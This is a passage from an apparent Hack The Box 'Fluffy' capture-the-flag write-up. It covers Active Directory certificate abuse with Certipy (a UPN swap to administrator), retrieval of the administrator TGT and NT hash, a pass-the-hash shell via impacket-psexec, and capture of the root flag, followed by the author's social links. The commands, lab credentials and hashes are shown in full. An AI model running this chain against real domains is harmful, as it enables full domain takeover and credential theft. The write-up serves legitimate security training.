certipy-ad req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User' Certipy v5.0.2 - by Oliver Lyak (ly4k) [!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail [*] Requesting certificate via RPC [*] Request ID is 16 [*] Successfully requested certificate [*] Got certificate with UPN 'administrator' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx'

After obtaining control over the ca_svc account, I changed its UPN to administrator, allowing me to request a certificate and impersonate the domain administrator (ESC8 abuse). Once I obtained and used the certificate to elevate privileges, I reverted the UPN to ca_svc@fluffy.htb using Certipy to reduce footprint and maintain operational stealth.

certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : ca_svc@fluffy.htb [*] Successfully updated 'ca_svc'

To finalize privilege escalation, I used the administrator.pfx file (obtained via ESC8) to authenticate as the Domain Administrator. Using Certipy, I authenticated against the DC and successfully retrieved the TGT and NTLM hash for administrator, confirming full domain compromise.

certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb' Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'administrator' [*] Using principal: 'administrator@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

With the NT hash aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e, I can now perform pass-the-hash attacks or dump secrets from the domain controller.

With the NT hash of DA (aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e) that I have obtained via certificate abuse, I used impacket-psexec to perform a Pass-the-Hash attack and gain remote command execution as Administrator by running the following in the terminal:

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e Administrator@10.10.11.69 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.10.11.69..... [*] Found writable share ADMIN$ [*] Uploading file TacUtDYd.exe [*] Opening SVCManager on 10.10.11.69..... [*] Creating service YGwK on 10.10.11.69..... [*] Starting service YGwK..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.6893] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is 3DE7-5FBC Directory of C:\Users\Administrator\Desktop 05/19/2025 03:31 PM <DIR> . 05/19/2025 03:31 PM <DIR> .. 07/02/2025 01:09 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 9,186,508,800 bytes free C:\Users\Administrator\Desktop> type root.txt 514bf6************************** C:\Users\Administrator\Desktop>

After successfully executing commands on the system, I navigated to the Administrator’s desktop and retrieved the final flag:

• cd C:\Users\Administrator\Desktop
• dir
• type root.txt

Hurray!!! I got the root flag.

Don't forget to subscribe to my mailing list and also follow me on my social media pages to get immediate notifications when I publish a new writeup. My socials are:

YouTube: https://www.youtube.com/@BoltechTechnologies1

LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/

Twitter: https://x.com/Isiaq_Ibrahim99

Twitter: https://x.com/BoltechNG

Medium: https://medium.com/@ibrahimbolaji50.ib